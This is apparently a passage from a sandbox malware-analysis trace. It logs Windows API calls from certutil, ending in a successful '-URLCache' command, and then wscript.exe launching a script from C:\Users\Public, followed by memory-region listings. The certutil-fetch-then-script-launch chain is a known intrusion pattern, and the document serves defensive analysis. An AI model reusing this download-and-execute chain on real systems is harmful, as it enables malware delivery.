[0045.142] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.142] GetLastError () returned 0x8009310b
[0045.142] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.142] GetLastError () returned 0x8009310b
[0045.142] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.142] GetLastError () returned 0x8009310b
[0045.142] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3c, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.142] GetLastError () returned 0x8009310b
[0045.143] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.143] GetLastError () returned 0x8009310b
[0045.143] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x17, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.143] GetLastError () returned 0x8009310b
[0045.143] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x25, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.143] GetLastError () returned 0x8009310b
[0045.143] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x41, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.143] GetLastError () returned 0x8009310b
[0045.143] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x43, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.143] GetLastError () returned 0x8009310b
[0045.143] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x30, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.143] GetLastError () returned 0x8009310b
[0045.143] PFXIsPFXBlob (pPFX=0x4d316bdd48) returned 0
[0045.143] CertOpenStore (lpszStoreProvider=0x5, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x0, pvPara=0x4d316bdb50) returned 0x0
[0045.143] GetLastError () returned 0x8009310b
[0045.143] LocalFree (hMem=0x0) returned 0x0
[0045.143] LocalFree (hMem=0x0) returned 0x0
[0045.143] CryptQueryObject (in: dwObjectType=0x2, pvObject=0x4d316bdc10, dwExpectedContentTypeFlags=0xfe, dwExpectedFormatTypeFlags=0x2, dwFlags=0x0, pdwMsgAndCertEncodingType=0x0, pdwContentType=0x4d316bdc58, pdwFormatType=0x0, phCertStore=0x0, phMsg=0x0, ppvContext=0x0 | out: pdwMsgAndCertEncodingType=0x0, pdwContentType=0x4d316bdc58, pdwFormatType=0x0, phCertStore=0x0, phMsg=0x0, ppvContext=0x0) returned 0
[0045.146] GetLastError () returned 0x80092009
[0045.146] _vsnprintf (in: _DstBuf=0x4d316bdb80, _MaxCount=0x8, _Format="%06x", _ArgList=0x4d316bdb38 | out: _DstBuf="000000") returned 6
[0045.146] _vsnprintf (in: _DstBuf=0x4d316bdc00, _MaxCount=0x32, _Format="%hs...", _ArgList=0x4d316bdb38 | out: _DstBuf=" ...") returned 5
[0045.146] _vsnprintf (in: _DstBuf=0x4d316bdbb0, _MaxCount=0x4f, _Format="%hs%hs%*hs%hs", _ArgList=0x4d316bdb38 | out: _DstBuf="000000 ...") returned 11
[0045.147] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24
[0045.147] _vsnwprintf (in: _Buffer=0x4d316bcad0, _BufferCount=0x1ff, _Format="%*hs%hs\n", _ArgList=0x4d316bdb28 | out: _Buffer=" 000000 ...\n") returned 14
[0045.147] GetFileType (hFile=0x24) returned 0x2
[0045.147] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x4d316bcad0*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x4d316bca84, lpReserved=0x0 | out: lpBuffer=0x4d316bcad0*, lpNumberOfCharsWritten=0x4d316bca84*=0xe) returned 1
[0045.148] _vsnprintf (in: _DstBuf=0x4d316bdb80, _MaxCount=0x8, _Format="%06x", _ArgList=0x4d316bdb38 | out: _DstBuf="04707e") returned 6
[0045.148] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24
[0045.148] _vsnwprintf (in: _Buffer=0x4d316bcad0, _BufferCount=0x1ff, _Format="%*hs%hs\n", _ArgList=0x4d316bdb28 | out: _Buffer=" 04707e\n") returned 9
[0045.148] GetFileType (hFile=0x24) returned 0x2
[0045.148] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x4d316bcad0*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x4d316bca84, lpReserved=0x0 | out: lpBuffer=0x4d316bcad0*, lpNumberOfCharsWritten=0x4d316bca84*=0x9) returned 1
[0045.149] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x22, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bda90, pvStructInfo=0x4d316bdb00, pcbStructInfo=0x4d316bdb38 | out: pvStructInfo=0x4d316bdb00, pcbStructInfo=0x4d316bdb38) returned 0
[0045.149] GetLastError () returned 0x8009310b
[0045.149] LocalFree (hMem=0x0) returned 0x0
[0045.149] LocalFree (hMem=0x0) returned 0x0
[0045.149] LocalFree (hMem=0x0) returned 0x0
[0045.149] LocalFree (hMem=0x0) returned 0x0
[0045.149] LocalFree (hMem=0x0) returned 0x0
[0045.156] LocalFree (hMem=0x4d337cc2f0) returned 0x0
[0045.156] LocalFree (hMem=0x4d33c50210) returned 0x0
[0045.156] LocalFree (hMem=0x4d33c40200) returned 0x0
[0045.158] LocalFree (hMem=0x4d33c301f0) returned 0x0
[0045.159] LocalFree (hMem=0x4d33c201e0) returned 0x0
[0045.159] LocalFree (hMem=0x4d33c101d0) returned 0x0
[0045.159] LocalFree (hMem=0x4d33c001c0) returned 0x0
[0045.159] LocalFree (hMem=0x4d33bf01b0) returned 0x0
[0045.159] LocalFree (hMem=0x4d33be01a0) returned 0x0
[0045.159] LocalFree (hMem=0x4d33bd0190) returned 0x0
[0045.160] LocalFree (hMem=0x4d33bc0180) returned 0x0
[0045.160] LocalFree (hMem=0x4d33bb0170) returned 0x0
[0045.160] LocalFree (hMem=0x4d33ba0160) returned 0x0
[0045.160] LocalFree (hMem=0x4d33b90150) returned 0x0
[0045.160] LocalFree (hMem=0x4d33b80140) returned 0x0
[0045.161] LocalFree (hMem=0x4d33b70130) returned 0x0
[0045.163] LocalFree (hMem=0x4d33b60120) returned 0x0
[0045.164] LocalFree (hMem=0x4d33b50110) returned 0x0
[0045.164] LocalFree (hMem=0x4d33b40100) returned 0x0
[0045.164] LocalFree (hMem=0x4d33b300f0) returned 0x0
[0045.164] LocalFree (hMem=0x4d33b200e0) returned 0x0
[0045.165] LocalFree (hMem=0x4d33b100d0) returned 0x0
[0045.165] LocalFree (hMem=0x4d33b000c0) returned 0x0
[0045.165] LocalFree (hMem=0x4d33af00b0) returned 0x0
[0045.165] LocalFree (hMem=0x4d33ae00a0) returned 0x0
[0045.166] LocalFree (hMem=0x4d33ad0090) returned 0x0
[0045.166] LocalFree (hMem=0x4d33ac0080) returned 0x0
[0045.166] LocalFree (hMem=0x4d33aa0260) returned 0x0
[0045.167] LocalFree (hMem=0x4d33a90250) returned 0x0
[0045.167] LocalFree (hMem=0x4d33a80240) returned 0x0
[0045.168] LocalFree (hMem=0x4d33a70230) returned 0x0
[0045.168] LocalFree (hMem=0x4d33a60220) returned 0x0
[0045.168] LocalFree (hMem=0x4d33a50210) returned 0x0
[0045.168] LocalFree (hMem=0x4d33a40200) returned 0x0
[0045.169] LocalFree (hMem=0x4d33a301f0) returned 0x0
[0045.170] LocalFree (hMem=0x4d33a201e0) returned 0x0
[0045.170] LocalFree (hMem=0x4d33a101d0) returned 0x0
[0045.170] LocalFree (hMem=0x4d33a001c0) returned 0x0
[0045.171] LocalFree (hMem=0x4d339f01b0) returned 0x0
[0045.172] LocalFree (hMem=0x4d339e01a0) returned 0x0
[0045.172] LocalFree (hMem=0x4d339d0190) returned 0x0
[0045.172] LocalFree (hMem=0x4d339c0180) returned 0x0
[0045.174] LocalFree (hMem=0x4d339b0170) returned 0x0
[0045.176] LocalFree (hMem=0x4d339a0160) returned 0x0
[0045.176] LocalFree (hMem=0x4d33990150) returned 0x0
[0045.176] LocalFree (hMem=0x4d33980140) returned 0x0
[0045.177] LocalFree (hMem=0x4d33970130) returned 0x0
[0045.177] LocalFree (hMem=0x4d33960120) returned 0x0
[0045.177] LocalFree (hMem=0x4d33950110) returned 0x0
[0045.178] LocalFree (hMem=0x4d33940100) returned 0x0
[0045.178] LocalFree (hMem=0x4d339300f0) returned 0x0
[0045.178] LocalFree (hMem=0x4d339200e0) returned 0x0
[0045.179] LocalFree (hMem=0x4d339100d0) returned 0x0
[0045.180] LocalFree (hMem=0x4d339000c0) returned 0x0
[0045.180] LocalFree (hMem=0x4d338f00b0) returned 0x0
[0045.181] LocalFree (hMem=0x4d338e00a0) returned 0x0
[0045.182] LocalFree (hMem=0x4d338d0090) returned 0x0
[0045.182] LocalFree (hMem=0x4d338c0080) returned 0x0
[0045.184] LocalFree (hMem=0x4d33888490) returned 0x0
[0045.184] LocalFree (hMem=0x4d33878480) returned 0x0
[0045.184] LocalFree (hMem=0x4d33868470) returned 0x0
[0045.184] LocalFree (hMem=0x4d33858460) returned 0x0
[0045.185] LocalFree (hMem=0x4d33848450) returned 0x0
[0045.186] LocalFree (hMem=0x4d33838440) returned 0x0
[0045.186] LocalFree (hMem=0x4d319bced0) returned 0x0
[0045.187] LocalFree (hMem=0x4d319acec0) returned 0x0
[0045.187] LocalFree (hMem=0x4d33828430) returned 0x0
[0045.189] LocalFree (hMem=0x4d33818420) returned 0x0
[0045.190] LocalFree (hMem=0x4d33808410) returned 0x0
[0045.191] LocalFree (hMem=0x4d337f8400) returned 0x0
[0045.191] LocalFree (hMem=0x4d337e83f0) returned 0x0
[0045.192] LocalFree (hMem=0x4d337d83e0) returned 0x0
[0045.193] LocalFree (hMem=0x4d33c60220) returned 0x0
[0045.194] InternetCloseHandle (hInternet=0xcc000c) returned 1
[0045.197] InternetCloseHandle (hInternet=0xcc0004) returned 1
[0045.197] FreeLibrary (hLibModule=0x7ffb2dd00000) returned 1
[0045.197] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff6baf5eb70
[0045.197] _vsnwprintf (in: _Buffer=0x4d316bf138, _BufferCount=0xb, _Format="%d", _ArgList=0x4d316bf128 | out: _Buffer="2022") returned 4
[0045.197] LoadStringW (in: hInstance=0x7ff6baf50000, uID=0x7e6, lpBuffer=0x4d316bef00, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29
[0045.197] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x4d337b8590
[0045.197] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24
[0045.197] _vsnwprintf (in: _Buffer=0x4d316be120, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x4d316bf178 | out: _Buffer="CertUtil: -URLCache command completed successfully.") returned 51
[0045.197] GetFileType (hFile=0x24) returned 0x2
[0045.197] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x4d316be120*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x4d316be0d4, lpReserved=0x0 | out: lpBuffer=0x4d316be120*, lpNumberOfCharsWritten=0x4d316be0d4*=0x33) returned 1
[0045.197] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24
[0045.197] _vsnwprintf (in: _Buffer=0x4d316be120, _BufferCount=0x1ff, _Format="\n", _ArgList=0x4d316bf178 | out: _Buffer="\n") returned 1
[0045.197] GetFileType (hFile=0x24) returned 0x2
[0045.197] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x4d316be120*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x4d316be0d4, lpReserved=0x0 | out: lpBuffer=0x4d316be120*, lpNumberOfCharsWritten=0x4d316be0d4*=0x1) returned 1
[0045.197] LocalFree (hMem=0x0) returned 0x0
[0045.197] LocalFree (hMem=0x4d318d4610) returned 0x0
[0045.197] LocalFree (hMem=0x4d318d8c40) returned 0x0
[0045.197] _vsnwprintf (in: _Buffer=0x4d316bf1a8, _BufferCount=0xb, _Format="%d", _ArgList=0x4d316bf198 | out: _Buffer="511") returned 3
[0045.198] LoadStringW (in: hInstance=0x7ff6baf50000, uID=0x1ff, lpBuffer=0x4d316bef70, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11
[0045.198] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x4d31966200
[0045.198] PostQuitMessage (nExitCode=0)
[0045.198] GetMessageW (in: lpMsg=0x4d316bf730, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x4d316bf730) returned 0
[0045.198] LocalFree (hMem=0x4d318efe80) returned 0x0
[0045.198] LocalFree (hMem=0x4d318f8ea0) returned 0x0
[0045.198] LocalFree (hMem=0x0) returned 0x0
[0045.198] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0
[0045.198] GetLastError () returned 0x7e
[0045.198] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffb21cd0000
[0045.198] GetProcAddress (hModule=0x7ffb21cd0000, lpProcName="DllMain") returned 0x7ffb21cda8f0
[0045.198] DllMain () returned 0x1
[0045.198] LocalFree (hMem=0x4d318e2990) returned 0x0
[0045.198] LocalFree (hMem=0x4d318e43c0) returned 0x0
[0045.198] LocalFree (hMem=0x4d31960270) returned 0x0
[0045.198] LocalFree (hMem=0x4d337b8590) returned 0x0
[0045.198] LocalFree (hMem=0x4d31966200) returned 0x0
[0045.198] LocalFree (hMem=0x4d318dc130) returned 0x0
[0045.199] LocalFree (hMem=0x4d318e4330) returned 0x0
[0045.199] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0
[0045.199] GetLastError () returned 0x7e
[0045.199] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffb21cd0000
[0045.199] GetProcAddress (hModule=0x7ffb21cd0000, lpProcName="DllMain") returned 0x7ffb21cda8f0
[0045.199] DllMain () returned 0x1
[0045.199] exit (_Code=0)
Thread:
id = 99
os_tid = 0xcf0
Thread:
id = 100
os_tid = 0x2dc
Thread:
id = 101
os_tid = 0x1f4
Thread:
id = 102
os_tid = 0x9d4
Thread:
id = 103
os_tid = 0xcfc
Process:
id = "7"
image_name = "wscript.exe"
filename = "c:\\windows\\system32\\wscript.exe"
page_root = "0x649bd000"
os_pid = "0x33c"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "4"
os_parent_pid = "0xc40"
cmd_line = "wscript.exe C:\\Users\\Public\\en-US.js"
cur_dir = "C:\\Windows\\system32\\"
os_username = "LHNIWSJ\\CIiHmnxMn6Ps"
os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1142
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1143
start_va = 0xabfe8c0000
end_va = 0xabfe8dffff
entry_point = 0x0
region_type = private
name = "private_0x000000abfe8c0000"
filename = ""
Region:
id = 1144
start_va = 0xabfe8e0000
end_va = 0xabfe8f3fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abfe8e0000"
filename = ""
Region:
id = 1145
start_va = 0xabfe900000
end_va = 0xabfe9fffff
entry_point = 0x0
region_type = private
name = "private_0x000000abfe900000"
filename = ""
Region:
id = 1146
start_va = 0xabfea00000
end_va = 0xabfea03fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abfea00000"
filename = ""
Region:
id = 1147
start_va = 0xabfea10000
end_va = 0xabfea10fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abfea10000"
filename = ""
Region:
id = 1148
start_va = 0xabfea20000
end_va = 0xabfea21fff
entry_point = 0x0
region_type = private
name = "private_0x000000abfea20000"
filename = ""
Region:
id = 1149
start_va = 0x7df5ff9d0000
end_va = 0x7ff5ff9cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ff9d0000"
filename = ""
Region:
id = 1150
start_va = 0x7ff6bd0e0000
end_va = 0x7ff6bd102fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6bd0e0000"
filename = ""
Region:
id = 1151
start_va = 0x7ff6bd10c000
end_va = 0x7ff6bd10cfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bd10c000"
filename = ""
Region:
id = 1152
start_va = 0x7ff6bd10e000
end_va = 0x7ff6bd10ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bd10e000"
filename = ""
Region:
id = 1153
start_va = 0x7ff6be0b0000
end_va = 0x7ff6be0ddfff
entry_point = 0x7ff6be0b0000
region_type = mapped_file
name = "wscript.exe"
filename = "\\Windows\\System32\\wscript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")
Region:
id = 1154
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1155
start_va = 0xabfebf0000
end_va = 0xabfeceffff
entry_point = 0x0
region_type = private
name = "private_0x000000abfebf0000"
filename = ""
Region:
id = 1156
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1157
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1158
start_va = 0xab80000000
end_va = 0xab813fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000ab80000000"
filename = ""
Region:
id = 1159
start_va = 0xabfe8c0000
end_va = 0xabfe8cffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abfe8c0000"
filename = ""
Region:
id = 1160
start_va = 0xabfe8d0000
end_va = 0xabfe8d6fff
entry_point = 0x0
region_type = private
name = "private_0x000000abfe8d0000"
filename = ""
Region:
id = 1161
start_va = 0xabfea30000
end_va = 0xabfeaedfff
entry_point = 0xabfea30000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1162
start_va = 0xabfeaf0000
end_va = 0xabfebeffff
entry_point = 0x0
region_type = private
name = "private_0x000000abfeaf0000"
filename = ""
Region:
id = 1163
start_va = 0xabfecf0000
end_va = 0xabfecf6fff
entry_point = 0x0
region_type = private
name = "private_0x000000abfecf0000"
filename = ""
Region:
id = 1164
start_va = 0xabfed00000
end_va = 0xabfed02fff
entry_point = 0xabfed00000
region_type = mapped_file
name = "wscript.exe.mui"
filename = "\\Windows\\System32\\en-US\\wscript.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\wscript.exe.mui")
Region:
id = 1165
start_va = 0xabfed10000
end_va = 0xabfed10fff
entry_point = 0x0
region_type = private
name = "private_0x000000abfed10000"
filename = ""
Region:
id = 1166
start_va = 0xabfed20000
end_va = 0xabfed20fff
entry_point = 0x0
region_type = private
name = "private_0x000000abfed20000"
filename = ""
Region:
id = 1167
start_va = 0xabfee40000
end_va = 0xabfee4ffff
entry_point = 0x0
region_type = private
name = "private_0x000000abfee40000"
filename = ""
Region:
id = 1168
start_va = 0xabfee50000
end_va = 0xabfefd7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abfee50000"
filename = ""
Region:
id = 1169
start_va = 0xabfefe0000
end_va = 0xabff160fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abfefe0000"
filename = ""
Region:
id = 1170
start_va = 0x7ff6bcfe0000
end_va = 0x7ff6bd0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6bcfe0000"
filename = ""
Region:
id = 1171
start_va = 0x7ff6bd10a000
end_va = 0x7ff6bd10bfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bd10a000"
filename = ""
Region:
id = 1172
start_va = 0x7ffb318d0000
end_va = 0x7ffb318d9fff
entry_point = 0x7ffb318d0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1173
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1174
start_va = 0x7ffb3c290000
end_va = 0x7ffb3c2c5fff
entry_point = 0x7ffb3c290000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1175
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1176
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1177
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1178
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1179
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1180
start_va = 0x7ffb3cb20000
end_va = 0x7ffb3cc60fff
entry_point = 0x7ffb3cb20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1181
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1182
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1183
start_va = 0x7ffb3d020000
end_va = 0x7ffb3d17bfff
entry_point = 0x7ffb3d020000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1184
start_va = 0xabfed30000
end_va = 0xabfed37fff
entry_point = 0xabfed30000
region_type = mapped_file
name = "wscript.exe"
filename = "\\Windows\\System32\\wscript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")
Region:
id = 1185
start_va = 0xabfed40000
end_va = 0xabfee3ffff
entry_point = 0x0
region_type = private
name = "private_0x000000abfed40000"
filename = ""
Region:
id = 1186
start_va = 0xabff170000
end_va = 0xabff227fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abff170000"
filename = ""
Region:
id = 1187
start_va = 0xabff230000
end_va = 0xabff233fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abff230000"
filename = ""
Region:
id = 1188
start_va = 0xabff240000
end_va = 0xabff240fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abff240000"
filename = ""
Region:
id = 1189
start_va = 0xabff250000
end_va = 0xabff250fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abff250000"
filename = ""
Region:
id = 1190
start_va = 0xabff2d0000
end_va = 0xabff2dffff
entry_point = 0x0
region_type = private
name = "private_0x000000abff2d0000"
filename = ""
Region:
id = 1191
start_va = 0xabff2e0000
end_va = 0xabff616fff
entry_point = 0xabff2e0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1192
start_va = 0x7ff6bd108000
end_va = 0x7ff6bd109fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bd108000"
filename = ""
Region:
id = 1193
start_va = 0x7ffb23a60000
end_va = 0x7ffb23b2dfff
entry_point = 0x7ffb23a60000
region_type = mapped_file
name = "jscript.dll"
filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll")
Region:
id = 1194
start_va = 0x7ffb37f40000
end_va = 0x7ffb37f61fff
entry_point = 0x7ffb37f40000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 1195
start_va = 0x7ffb38610000
end_va = 0x7ffb386a5fff
entry_point = 0x7ffb38610000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1196
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1197
start_va = 0x7ffb39c00000
end_va = 0x7ffb39c97fff
entry_point = 0x7ffb39c00000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 1198
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
